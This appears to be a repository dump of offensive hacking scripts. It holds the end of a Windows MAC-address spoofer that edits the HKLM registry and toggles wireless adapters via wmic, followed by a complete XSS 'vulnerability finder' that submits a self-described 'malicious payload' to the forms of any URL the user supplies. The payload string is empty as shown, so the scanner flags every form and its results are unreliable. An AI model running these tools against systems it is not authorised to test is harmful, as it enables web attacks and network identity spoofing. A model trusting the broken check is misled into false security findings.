| # we have to specify that we want to capture the output, so we specify the second 39 | # argument as capture_output = True. This information gets stored in the stdout attribute. 40 | # The information is stored in bytes and we need to decode it to Unicode before we use it 41 | # as a String in Python. 42 | # We use Python to run the getmac command, and then capture the output. 43 | # We split the output at the newline so that we can work with the individual lines 44 | # (which will contain the Mac and transport name). 45 | getmac_output = subprocess.run("getmac", capture_output=True).stdout.decode().split('\n') 46 | 47 | # We loop through the output 48 | for macAdd in getmac_output: 49 | # We use the regex to find the Mac Addresses. 50 | macFind = macAddRegex.search(macAdd) 51 | # We use the regex to find the transport name. 52 | transportFind = transportName.search(macAdd) 53 | # If you don't find a Mac Address or Transport name the option won't be listed. 54 | if macFind == None or transportFind == None: 55 | continue 56 | # We append a tuple with the Mac Address and the Transport name to a list. 57 | mac_addresses.append((macFind.group(0),transportFind.group(0))) 58 | 59 | # Create a simple menu to select which Mac Address the user want to update. 60 | print("Which MAC Address do you want to update?") 61 | for index, item in enumerate(mac_addresses): 62 | print(f"{index} - Mac Address: {item[0]} - Transport Name: {item[1]}") 63 | 64 | # Prompt the user to select Mac Address they want to update. 65 | option = input("Select the menu item number corresponding to the MAC that you want to change:") 66 | 67 | # Create a simple menu so the user can pick a MAC address to use 68 | while True: 69 | print("Which MAC address do you want to use? This will change the Network Card's MAC address.") 70 | for index, item in enumerate(mac_to_change_to): 71 | print(f"{index} - Mac Address: {item}") 72 | 73 | # Prompt the user to select the MAC address they want to change to. 74 | update_option = input("Select the menu item number corresponding to the new MAC address that you want to use:") 75 | # Check to see if the option the user picked is a valid option. 76 | if int(update_option) >= 0 and int(update_option) < len(mac_to_change_to): 77 | print(f"Your Mac Address will be changed to: {mac_to_change_to[int(update_option)]}") 78 | break 79 | else: 80 | print("You didn't select a valid option. Please try again!") 81 | 82 | # We know the first part of the key, we'll append the folders where we'll search the values 83 | controller_key_part = r"SYSTEM\ControlSet001\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}" 84 | 85 | # We connect to the HKEY_LOCAL_MACHINE registry. If we specify None, 86 | # it means we connect to local machine's registry. 87 | with winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) as hkey: 88 | # Create a list for the 21 folders. I used a list comprehension. The expression part of the list comprehension 89 | # makes use of a ternary operator. The transport value for you Mac Address should fall within this range. 90 | # You could write multiple lines. 91 | controller_key_folders = [("\\000" + str(item) if item < 10 else "\\00" + str(item)) for item in range(0, 21)] 92 | # We now iterate through the list of folders we created. 93 | for key_folder in controller_key_folders: 94 | # We try to open the key. If we can't we just except and pass. But it shouldn't be a problem. 95 | try: 96 | # We have to specify the registry we connected to, the controller key 97 | # (This is made up of the controller_key_part we know and the folder(key) name we created 98 | # with the list comprehension). 99 | with winreg.OpenKey(hkey, controller_key_part + key_folder, 0, winreg.KEY_ALL_ACCESS) as regkey: 100 | # We will now look at the Values under each key and see if we can find the "NetCfgInstanceId" 101 | # with the same Transport Id as the one we selected. 102 | try: 103 | # Values start at 0 in the registry and we have to count through them. 104 | # This will continue until we get a WindowsError (Where we will then just pass) 105 | # then we'll start with the next folder until we find the correct key which contains 106 | # the value we're looking for. 107 | count = 0 108 | while True: 109 | # We unpack each individual winreg value into name, value and type. 110 | name, value, type = winreg.EnumValue(regkey, count) 111 | # To go to the next value if we didn't find what we're looking for we increment count. 112 | count = count + 1 113 | # We check to see if our "NetCfgInstanceId" is equal to our Transport number for our 114 | # selected Mac Address. 115 | if name == "NetCfgInstanceId" and value == mac_addresses[int(option)][1]: 116 | new_mac_address = mac_to_change_to[int(update_option)] 117 | winreg.SetValueEx(regkey, "NetworkAddress", 0, winreg.REG_SZ, new_mac_address) 118 | print("Successly matched Transport Number") 119 | # get list of adapters and find index of adapter you want to disable. 120 | break 121 | except WindowsError: 122 | pass 123 | except: 124 | pass 125 | 126 | 127 | # Code to disable and enable Wireless devicess 128 | run_disable_enable = input("Do you want to disable and reenable your wireless device(s). Press Y or y to continue:") 129 | # Changes the input to lowercase and compares to y. If not y the while function which contains the last part will never run. 130 | if run_disable_enable.lower() == 'y': 131 | run_last_part = True 132 | else: 133 | run_last_part = False 134 | 135 | # run_last_part will be set to True or False based on above code. 136 | while run_last_part: 137 | 138 | # Code to disable and enable the network adapters 139 | # We get a list of all network adapters. You have to ignore errors, as it doesn't like the format the command returns the data in. 140 | network_adapters = subprocess.run(["wmic", "nic", "get", "name,index"], capture_output=True).stdout.decode('utf-8', errors="ignore").split('\r\r\n') 141 | for adapter in network_adapters: 142 | # We get the index for each adapter 143 | adapter_index_find = adapterIndex.search(adapter.lstrip()) 144 | # If there is an index and the adapter has wireless in description we are going to disable and enable the adapter 145 | if adapter_index_find and "Wireless" in adapter: 146 | disable = subprocess.run(["wmic", "path", "win32_networkadapter", "where", f"index={adapter_index_find.group(0)}", "call", "disable"],capture_output=True) 147 | # If the return code is 0, it means that we successfully disabled the adapter 148 | if(disable.returncode == 0): 149 | print(f"Disabled {adapter.lstrip()}") 150 | # We now enable the network adapter again. 151 | enable = subprocess.run(["wmic", "path", f"win32_networkadapter", "where", f"index={adapter_index_find.group(0)}", "call", "enable"],capture_output=True) 152 | # If the return code is 0, it means that we successfully enabled the adapter 153 | if (enable.returncode == 0): 154 | print(f"Enabled {adapter.lstrip()}") 155 | 156 | # We run the getmac command again 157 | getmac_output = subprocess.run("getmac", capture_output=True).stdout.decode() 158 | # We recreate the Mac Address as ot shows up in getmac XX-XX-XX-XX-XX-XX format from the 12 character string we have. We split the string into strings of length 2 using list comprehensions and then. We use "-".join(list) to recreate the address 159 | mac_add = "-".join([(mac_to_change_to[int(update_option)][i:i+2]) for i in range(0, len(mac_to_change_to[int(update_option)]), 2)]) 160 | # We want to check if Mac Address we changed to is in getmac output, if so we have been successful. 161 | if mac_add in getmac_output: 162 | print("Mac Address Success") 163 | # Break out of the While loop. Could also change run_last_part to False. 164 | break -------------------------------------------------------------------------------- /xss-vulnerability-finder.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from pprint import pprint 3 | from bs4 import BeautifulSoup as bs 4 | from urllib.parse import urljoin 5 | 6 | print (''' 7 | [?] Basic XSS-Vulnerability Finder Tool [?] 8 | code from R3dHULK 9 | ''') 10 | def get_all_forms(url): 11 | """Given a `url`, it returns all forms from the HTML content""" 12 | soup = bs(requests.get(url).content, "html.parser") 13 | return soup.find_all("form") 14 | def get_form_details(form): 15 | """ 16 | This function extracts all possible useful information about an HTML `form` 17 | """ 18 | details = {} 19 | # get the form action (target url) 20 | action = form.attrs.get("action", "").lower() 21 | # get the form method (POST, GET, etc.) 22 | method = form.attrs.get("method", "get").lower() 23 | # get all the input details such as type and name 24 | inputs = [] 25 | for input_tag in form.find_all("input"): 26 | input_type = input_tag.attrs.get("type", "text") 27 | input_name = input_tag.attrs.get("name") 28 | inputs.append({"type": input_type, "name": input_name}) 29 | # put everything to the resulting dictionary 30 | details["action"] = action 31 | details["method"] = method 32 | details["inputs"] = inputs 33 | return details 34 | def submit_form(form_details, url, value): 35 | """ 36 | Submits a form given in `form_details` 37 | Params: 38 | form_details (list): a dictionary that contain form information 39 | url (str): the original URL that contain that form 40 | value (str): this will be replaced to all text and search inputs 41 | Returns the HTTP Response after form submission 42 | """ 43 | # construct the full URL (if the url provided in action is relative) 44 | target_url = urljoin(url, form_details["action"]) 45 | # get the inputs 46 | inputs = form_details["inputs"] 47 | data = {} 48 | for input in inputs: 49 | # replace all text and search values with `value` 50 | if input["type"] == "text" or input["type"] == "search": 51 | input["value"] = value 52 | input_name = input.get("name") 53 | input_value = input.get("value") 54 | if input_name and input_value: 55 | # if input name and value are not None, 56 | # then add them to the data of form submission 57 | data[input_name] = input_value 58 | 59 | print(f"[+] Submitting malicious payload to {target_url}") 60 | print(f"[+] Data: {data}") 61 | if form_details["method"] == "post": 62 | return requests.post(target_url, data=data) 63 | else: 64 | # GET request 65 | return requests.get(target_url, params=data) 66 | 67 | def scan_xss(url): 68 | """ 69 | Given a 'url', it prints all XSS vulnerable forms and 70 | returns True if any is vulnerable, False otherwise 71 | """ 72 | # get all the forms from the URL 73 | forms = get_all_forms(url) 74 | print(" ") 75 | print(f"[+] Detected {len(forms)} forms on {url}.") 76 | js_script = "" 77 | # returning value 78 | is_vulnerable = False 79 | # iterate over all forms 80 | for form in forms: 81 | form_details = get_form_details(form) 82 | content = submit_form(form_details, url, js_script).content.decode() 83 | if js_script in content: 84 | print(f"[+] XSS Detected on {url}") 85 | print(f"[*] Form details:") 86 | pprint(form_details) 87 | is_vulnerable = True 88 | # won't break because we want to print available vulnerable forms 89 | return is_vulnerable 90 | if __name__ == "__main__": 91 | url = input ("HULK Ask You to Enter the parameter : ") 92 | print(scan_xss(url)) 93 | print(" ") 94 | print ("[*] Scan Completed") 95 | print (" ") 96 | input ("Enter To Continue") --------------------------------------------------------------------------------